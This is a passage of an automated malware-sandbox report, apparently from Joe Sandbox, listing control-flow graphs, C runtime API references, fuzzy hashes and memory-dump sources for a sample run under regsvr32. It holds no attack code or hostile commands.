84->52 94 2b83e08-2b83e12 call 2b84a8c 85->94 86->94 114 2b83cda-2b83d00 call 2b834d8 call 2b84190 88->114 115 2b83d16-2b83d1c 88->115 89->76 94->45 109 2b83e18-2b83e66 call 2b8312c call 2b83330 94->109 100->38 112 2b83b5f-2b83b7f call 2b82b3c * 2 call 2b84a8c 100->112 101->100 105 2b83b3b-2b83b46 101->105 105->100 110 2b83b48-2b83b4d 105->110 109->45 110->34 110->100 135 2b83b81-2b83b8b call 2b84b7c 112->135 136 2b83b96-2b83b97 112->136 130 2b83d02-2b83d14 114->130 131 2b83d27-2b83d7b call 2b8397c 114->131 118 2b83d1e-2b83d22 115->118 119 2b83d80-2b83d81 115->119 118->88 119->89 130->114 130->115 131->119 139 2b83b91-2b83ef4 call 2b82914 call 2b8454c call 2b84d78 135->139 140 2b83ef5-2b83efa call 2b87168 135->140 136->38 139->140 140->80
                    APIs
                    • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02B83AAC
                      • Part of subcall function 02B849F4: __GetUnwindTryBlock.LIBCMT ref: 02B84A37
                      • Part of subcall function 02B849F4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02B84A5C
                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 02B83B84
                    • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02B83DD3
                    • std::bad_alloc::bad_alloc.LIBCMT ref: 02B83EDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                    • String ID: csm$csm$csm
                    • API String ID: 849930591-393685449
                    • Opcode ID: 8e496da07347f5ca4c0083d8cca6809d31876793616045b4dee25a5dda52bfd8
                    • Instruction ID: 3545d1fe30d13a1a165a507286fba6b1a81df5f26d1af7d0718fd667230cea38
                    • Opcode Fuzzy Hash: 8e496da07347f5ca4c0083d8cca6809d31876793616045b4dee25a5dda52bfd8
                    • Instruction Fuzzy Hash: 1AE17231918B488FDB24FF68C4856A9B7E1FB99714F5406DEE84DC7251DB34E881CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FFE1023AC97), ref: 00007FFE1023A9B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true
                    • Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: __acrt_iob_func
                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                    • API String ID: 711238415-1534286854
                    • Opcode ID: 22bd08bf3ace6588938a1acacbc043cc81844aa84b39eaebb0131b0af98e6ef0
                    • Instruction ID: f164e64ae8ead92d781da1d312819bf43c8aed45f2b99bd6ff152f6b6158627e
                    • Opcode Fuzzy Hash: 22bd08bf3ace6588938a1acacbc043cc81844aa84b39eaebb0131b0af98e6ef0
                    • Instruction Fuzzy Hash: DE715DA2F05B498EEB50CB56E8816A927A1FB88BD4F544475DF0D9776AEF3CE601C300
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true
                    • Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: __p___argc__p___wargv__p__wenviron_configure_wide_argv_set_new_mode
                    • String ID:
                    • API String ID: 3305919566-0
                    • Opcode ID: c3cd763eb9e9f8b7c9556cb38ece850fa7336141f25a0961490245c00d1de611
                    • Instruction ID: 132fe945847adbeb865f0e4ac0c5de05305846f945e39d47ef8b1a829edb0cb6
                    • Opcode Fuzzy Hash: c3cd763eb9e9f8b7c9556cb38ece850fa7336141f25a0961490245c00d1de611
                    • Instruction Fuzzy Hash: CD012D76A04F098EE7159F26E4813AC3761EB88798F404570EB0D4B7A7CE38D490C340
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true
                    • Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_set_new_mode
                    • String ID:
                    • API String ID: 556796188-0
                    • Opcode ID: d713d1ab00fc09b2163b8151d51110b22cf4d64260805eb9c7e1ae8cb6c399b9
                    • Instruction ID: 254913d659bcfaf2341cb3cf5820ed1f2dcacf6bdb65f23f03e2ff341c4893d9
                    • Opcode Fuzzy Hash: d713d1ab00fc09b2163b8151d51110b22cf4d64260805eb9c7e1ae8cb6c399b9
                    • Instruction Fuzzy Hash: 4901E976A04F498EE715AF26E4853AD37A4EB8CB98F508571E70D4B7A6CE3CD490C740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 211 2b842d0-2b84318 call 2b82ae4 call 2b82b3c 216 2b8431a-2b84320 211->216 217 2b84352-2b84356 211->217 216->217 220 2b84322-2b84324 216->220 218 2b843ea-2b843ee 217->218 219 2b8435c-2b84360 217->219 225 2b843f0-2b843fc 218->225 226 2b84432-2b84438 218->226 223 2b844e1 219->223 224 2b84366-2b8436e 219->224 221 2b84336-2b84338 220->221 222 2b84326-2b8432a 220->222 221->217 227 2b8433a-2b84346 221->227 222->227 228 2b8432c-2b84334 222->228 234 2b844e6-2b84500 223->234 224->223 231 2b84374-2b84378 224->231 232 2b843fe-2b84402 225->232 233 2b84412-2b8441e 225->233 229 2b844a8-2b844dc call 2b83a50 226->229 230 2b8443a-2b8443e 226->230 227->217 237 2b84348-2b8434c 227->237 228->217 228->221 229->223 230->229 236 2b84440-2b84447 230->236 238 2b8437a-2b8437c 231->238 239 2b843d7-2b843e5 call 2b830c8 231->239 232->233 241 2b84404-2b84410 call 2b834c4 232->241 233->223 235 2b84424-2b8442c 233->235 235->223 235->226 236->229 242 2b84449-2b84451 236->242 237->217 237->223 244 2b8437e-2b84390 call 2b83654 238->244 245 2b843b5-2b843b7 238->245 239->223 241->226 241->233 242->229 248 2b84453-2b84466 call 2b834d8 242->248 252 2b84501-2b84507 call 2b871f4 244->252 259 2b84396-2b84399 244->259 245->239 247 2b843b9-2b843c1 245->247 247->252 253 2b843c7-2b843cb 247->253 248->229 262 2b84468-2b844a6 248->262 253->252 257 2b843d1-2b843d5 253->257 261 2b843a5-2b843b0 call 2b84868 257->261 259->252 263 2b8439f-2b843a3 259->263 261->223 262->234 263->261
                    APIs
                    • __except_validate_context_record.LIBVCRUNTIME ref: 02B842F8
                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 02B843E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                    • String ID: csm$csm
                    • API String ID: 3896166516-3733052814
                    • Opcode ID: 0aa7a5c376eeb5ae11e699671e149143c489387923b3f49e9a28d806dabbf491
                    • Instruction ID: 03b7efb2ff19b5feac05cad7833a29443d909a818d564723ea90c74ac6f18556
                    • Opcode Fuzzy Hash: 0aa7a5c376eeb5ae11e699671e149143c489387923b3f49e9a28d806dabbf491
                    • Instruction Fuzzy Hash: 33618134218B4A8FCB68FF289084765B7E1FB58315F5C46AED49DC7651CB70D885CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 267 2b82690-2b826d6 call 2b82ae4 270 2b826dc-2b826e6 267->270 271 2b827cd-2b827d4 267->271 272 2b827b9-2b827bb 270->272 273 2b82878-2b8287e 271->273 274 2b826eb-2b826f9 272->274 275 2b827c1 272->275 276 2b827d9-2b827e7 273->276 277 2b82884 273->277 278 2b826ff-2b82706 274->278 279 2b827b7 274->279 275->277 280 2b827ed-2b827f5 276->280 281 2b82876 276->281 282 2b82889-2b828a6 277->282 278->279 283 2b8270c-2b82711 278->283 279->272 280->281 284 2b827f7-2b827fb 280->284 281->273 283->279 285 2b82717-2b8271c 283->285 286 2b8283c-2b8284d 284->286 287 2b827fd-2b82802 284->287 288 2b82739-2b8273f 285->288 289 2b8271e-2b82731 285->289 290 2b8285f-2b82873 286->290 291 2b8284f-2b82855 286->291 292 2b82838-2b8283a 287->292 293 2b82804-2b82810 287->293 295 2b82769-2b827b2 call 2b82ab0 call 2b82ae0 288->295 296 2b82741-2b82749 288->296 306 2b827c6-2b827c8 289->306 307 2b82737 289->307 290->281 291->281 294 2b82857-2b8285b 291->294 292->277 292->286 297 2b82831-2b82836 293->297 298 2b82812-2b82819 293->298 294->277 302 2b8285d 294->302 295->279 296->295 303 2b8274b-2b82759 call 2b8f2e0 296->303 297->292 297->293 298->297 300 2b8281b-2b82824 298->300 300->297 305 2b82826-2b8282f 300->305 302->281 303->295 311 2b8275b-2b82761 303->311 305->292 305->297 306->282 307->279 307->288 311->295
                    APIs
                    • __except_validate_context_record.LIBVCRUNTIME ref: 02B826BB
                    • _IsNonwritableInCurrentImage.LIBCMT ref: 02B82752
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentImageNonwritable__except_validate_context_record
                    • String ID: csm
                    • API String ID: 3242871069-1018135373
                    • Opcode ID: e32cc06ee6daa03ae3f3bc1a8189994b09bd6cfa9f32bc22b13863d2a7eee494
                    • Instruction ID: 0be6dfce24e7814735482a9da30034dee47f7f1f0d9002de67a9db724b75c611
                    • Opcode Fuzzy Hash: e32cc06ee6daa03ae3f3bc1a8189994b09bd6cfa9f32bc22b13863d2a7eee494
                    • Instruction Fuzzy Hash: EE61AF30618A898BDF28FE5DD885A7973D1FB54354B1041AEEC8AC3256EB30FC52CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 313 2b83f20-2b83f53 314 2b83f59-2b83f7b call 2b82b3c 313->314 315 2b8416c-2b84186 313->315 318 2b83fd8-2b83fea 314->318 319 2b83f7d-2b83f91 call 2b82b3c 314->319 320 2b83ff0-2b84034 call 2b831fc 318->320 321 2b84187-2b8418f call 2b871f4 318->321 319->318 331 2b83f93-2b83f99 319->331 320->315 328 2b8403a-2b84045 320->328 330 2b8404c-2b84087 328->330 332 2b8414b-2b84166 330->332 333 2b8408d-2b84099 330->333 331->318 334 2b83f9b-2b83fa1 331->334 332->315 332->330 333->332 335 2b8409f-2b840c4 333->335 334->318 336 2b83fa3-2b83fd2 call 2b82fe4 334->336 337 2b840c6-2b840d2 call 2b834c4 335->337 338 2b840f7-2b840fa 335->338 336->315 336->318 345 2b840ef-2b840f0 337->345 346 2b840d4-2b840d7 337->346 338->332 342 2b840fc-2b84146 call 2b8397c 338->342 342->332 345->338 347 2b840d9-2b840e5 call 2b834c4 346->347 348 2b840e7 346->348 350 2b840e9-2b840ed 347->350 348->350 350->332 350->345
                    APIs
                    • _CallSETranslator.LIBVCRUNTIME ref: 02B83FCB
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: CallTranslator
                    • String ID: MOC$RCC
                    • API String ID: 3163161869-2084237596
                    • Opcode ID: 07c68a8826f396dc2633518cec89643c6e24fd7e0188cafc8116b23aa0883d7f
                    • Instruction ID: dab6447ae6f46b1c2aebaa52fd2ff36f654556f9357f9325e455b2ce29fd7749
                    • Opcode Fuzzy Hash: 07c68a8826f396dc2633518cec89643c6e24fd7e0188cafc8116b23aa0883d7f
                    • Instruction Fuzzy Hash: A8719230518B898FD768FF68C446BAAB7E0FB99304F144A9ED48DC3251DB74E581CB82
                    Uniqueness

                    Uniqueness Score: -1.00%